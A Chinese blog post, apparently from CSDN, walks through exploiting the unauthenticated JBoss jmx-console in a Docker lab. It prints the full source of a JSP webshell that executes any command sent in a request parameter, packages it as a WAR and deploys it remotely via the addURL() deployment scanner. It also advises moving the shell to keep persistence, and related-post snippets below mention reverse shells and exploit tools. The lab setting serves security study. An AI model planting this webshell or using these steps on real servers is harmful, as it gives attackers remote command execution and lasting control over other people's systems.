Jboss未授权访问漏洞复现

已于 2024-06-16 22:37:35 修改
阅读量309 收藏 3
点赞数 4
分类专栏: 漏洞复现 文章标签: web安全
于 2024-06-14 17:57:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40860153/article/details/139685808
版权

文章目录

概要

在低版本的 JBoss 中,默认可以访问 JBoss Web 控制台(http://IP:8080/jmx-console),无需用户名和密码。通过 JBoss 未授权访问管理控制台的漏洞,可以进行后台服务管理,可以通过脚本命令执行系统命令,如反弹 shell、wget 写 Webshell 文件。

靶场搭建

这里使用docker搭建Jboss漏洞靶场:

#搜索JBoss环境
docker search testjboss
 
#选择需要的环境
docker pull testjboss/jboss
 
#实例化testjboss/jboss镜像
docker run -d-p 8088:8080 testjboss/jboss

我的虚拟机IP:192.168.1.129,即靶场地址为:

http://192.168.1.129:8088/

在这里插入图片描述

漏洞复现

一、通过addURL()远程部署利用

1、将jsp文件压缩成war格式的文件,压缩命令:

jar cvf one.war one.jsp

在这里插入图片描述
jsp内容:

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;          
        byte[] b = new byte[1024];          
        out.print("<pre>");          
        while((a=in.read(b))!=-1){
            out.println(new String(b));          
        }
        out.print("</pre>");
    } 
%>

2、将war包上传到自己的服务器,可以利用命令:python -m http.server 8001搭建一个http服务供下载war包。
在这里插入图片描述
3、Jboxx4.x /jmx-console/ 后台存在未授权访问,找到jboss.deployment(jboss 自带的部署功能)中的flavor=URL,type=DeploymentScanner点进去(通过 url 的方式远程部署)
在这里插入图片描述
在这里插入图片描述
4、 找到页面中的void addURL()选项来远程加载war包来部署。
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
5、接下来查看是否部署成功,返回到刚进入jmx-console的页面,找到 jboss.web.deployment,如下说明部署成功。如果没显示,多刷新几次页面或者等会儿,直到看到有部署的war包即可。
在这里插入图片描述
6、接下来直接访问上传的webshell,成功访问。
在这里插入图片描述

#通常像上面这样部署的webshell,物理路径默认都会在以下目录下 \jboss-4.2.3.GA\server\default\tmp\deploy\xxx.war
#这个目录只能临时用,还需要把shell转移到jmx-console的默认目录来巩固权限 \jboss-4.2.3.GA\server\default\deploy\jmx-console.war

二、利用工具直接反弹shell

在这里插入图片描述

HelloYo_k
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JBOSS授权访问
jia3643的博客
09-28 1317
0X01、漏洞描述 jobss 授权访问管理控制台,通过该漏洞,可以后台管理服务,可以通过脚本命令执行系统命令,如反弹shell,wget写webshell文件。 fofa找个站,访问 //jmx-console/ 0X02、漏洞复现 思路一 进入 jboss.deployment 部署页面 cs搭建web服务器,上传木马,通过addurl进行远程部署 部署成功后访问 目录文件名,便可进入木马。eg:AAA.war 则访问 /AAA/index.jsp 思路二:直接构造poc /jmx-conso
授权访问JBoss授权访问漏洞
qq_68163788的博客
05-12 536
JBoss授权访问漏洞是指攻击者可以通过构造特定的请求包,在授权的情况下远程执行命令,进而控制服务器。该漏洞主要影响JBoss管理界面,由于默认配置下,JBoss管理界面存在弱口令和默认账户等问题,因此容易被攻击者利用。 攻击者通过向JBoss管理界面发送恶意请求,可以实现对服务器的远程命令执行、文件上传等操作。此外,由于JBoss管理界面存在多个版本,不同版本的漏洞细节也存在差异,因此需要根据具体情况进行修复
Jboss授权访问
qq_44880255的博客
08-11 1433
1、jmx-console授权访问 漏洞原因 JBoss默认访问jmx-console页面不需要输入密码,可以进入配置war包进行危险操作。或默认用户名密码为admin/admin。 漏洞复现 这里使用的环境是kali中的vulhub和docker。 进入vulhub/jboss/CVE-2017-12149目录,执行命令docker-compose up -d开启环境。 访问http://your-ip:8080/。(这里我的IP是172.17.0.1) 构造payload部署war包。 http
JBoss 授权访问和弱口令复现
weixin_53747497的博客
02-21 1424
一个基于J2EE的开放源代码的应用服务器。JBoss 是一个管理 EJB 的容器和服务器,但 JBoss 核心服务不包括支持 servlet/JSP 的WEB容器,一般 与Tomcat或Jetty绑定使用。Jboss是Java EE 应用服务器(就像Apache是web服务器一样),专门用来 运行Java EE程序的。JBoss Administration Console存在默认账号密码admin/admin,但如果在vulhub上搭建的靶场,那密码就是vulhub。
jboss反序列化漏洞检测工具
02-15
jboss中间件的反序列化漏洞检测工具,可检测主机搭建的中间件并获得shell
Jboss漏洞利用小工具
11-06
在过去的几年中,由于其广泛使用,JBoss也成为了黑客们的目标,存在一些安全漏洞,这些漏洞如果被恶意利用,可能会导致系统被攻击者控制、数据泄露或服务中断。本文将深入探讨JBoss漏洞利用及其防范措施。 1. **...
jboss与struts漏洞解决
08-13
JBoss与Struts漏洞解决详解》 在信息技术领域,安全问题始终是不容忽视的关键环节。本文主要针对两个常见的漏洞——JBoss漏洞和Struts漏洞,详述其情况、影响以及解决方案,旨在帮助用户理解漏洞的危害并采取有效...
Jboss授权访问getshell(JMX-Console)
weixin_51151498的博客
12-10 1115
Jboss授权访问getshell(JMX-Console)
JBOSS授权漏洞总结
m0_64481831的博客
04-03 1263
JBOSS是一个基于J2EE的开放源代码应用服务器,也是一个管理EJB的容器和服务器,默认使用8080端口监听。JBOSS授权访问漏洞介绍漏洞原理JBOSS授权漏洞在默认情况下无需账号密码就可以直接访问后台管理控制台页面(),导致攻击者可以获取网站信息、上传webshell,获取服务器权限等。
JBoss漏洞:Jboss授权访问漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-09 991
Jboss授权访问漏洞合集:JBOSS授权访问漏洞表现为,在默认情况下无需账密就可以直接访问http://127.0.0.1:8080/jmx-console进入管理控制台,进而导致网站信息泄露、服务器被上传shell(如反弹shell,wget写webshell文件),最终网站被攻陷。 该漏洞影响所有低版本的JBOSS,对其下用户影响深远. JBoss 4 使用vulnhub提供的环境
中间件安全-jboss授权访问
ce666666的博客
01-23 2636
中间件是什么? 连接软件和应用的计算机软件,以便运行再一台或多台机器上的多个软件通过网络进行交互。中间件在操作系统、网络和数据库之上,应用软件的下层,总的作用是为处于自己上层的应用软件提供运行与开发的环境,帮助用户灵活、高效地开发和集成复杂的应用软件 Jboss是什么? Jboss是一个基于J2EE的开放源代码的应用服务器​ Jboss漏洞 jboss授权访问(木马有问题) 授权访问管理控制台,通过该漏洞,可以后台管理服务,可以通过脚本命令执行系统命令,如反弹shell,wget写webshell
漏洞挖掘】——89、JBOSS授权访问利用
最新发布
Fly_鹏程万里
06-14 49
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用,JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范,默认情况下访问http://ip:8080/jmx-console可以浏览JBoss的部署管理的信息,不需要输入用户名和密码可以直接部署上传木马存在安全隐患。
JBOSS授权漏洞详细复现
热门推荐
柠鹿的轨迹
11-06 1万+
0x00 前言 习常规而明其理,探非凡且有所见。 --涂寐 0x01 JBOSS授权访问简介 JBOSS是一个基于J2EE的开放源代码应用服务器,也是一个管理EJB的容器和服务器,默认使用8080端口监听。 JBOSS授权访问漏洞表现为,在默认情况下无需账密就可以直接访问 http://127.0.0.1:8080/jmx-console 进入管理控制台,进而导致网站信息泄露、服务器被上传...
JBOSS 授权访问漏洞复现学习
0nc3的博客
12-18 1431
0x00 漏洞简介 JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。 默认情况下访问 http://ip:8080/jmx-console 就可以访问管理控制台,不需要输入用户名和密码就可以直接浏览 JBoss 的部署管理的信息,部署上传木马,存在...
JBOSS授权访问漏洞利用
Fuzz
02-25 630
1. 环境搭建 https://www.cnblogs.com/chengNo1/p/14297387.html 搭建好vulhub平台后 进入对应漏洞目录 cd vulhub/jboss/CVE-2017-7504/ 开启环境 docker-compose up -d 2. 访问 http://172.16.12.15:8080/ 进入后台。点击JMX Console 3. 漏洞利用工具 1、下载地址:https://github.com/joaomatosf/jexboss 2、cd jexboss
Mycat之Java JMX 授权访问漏洞-关闭Jmx
wayne625的博客
01-23 1047
Mycat 关闭Jmx
jboss反序列化漏洞
08-16
JBoss反序列化漏洞是指JBoss应用服务器中存在的一种安全漏洞,具体表现为Java反序列化错误类型。该漏洞存在于JBoss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致漏洞的出现。攻击者可以利用此漏洞发送特制的请求,通过发送包含恶意序列化数据的POST请求到`/invoker/readonly`路径,实现远程代码执行的攻击。这个漏洞可以在JBoss 5.x和6.x版本中被利用。如果访问`http://ip:端口/jbossmq-httpil/HTTPServerILServlet`出现相关页面,就可能存在该漏洞。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [jboss反序列化漏洞](https://blog.csdn.net/weixin_48776804/article/details/116919336)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [JBOSS反序列化漏洞](https://blog.csdn.net/weixin_52206305/article/details/125534761)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值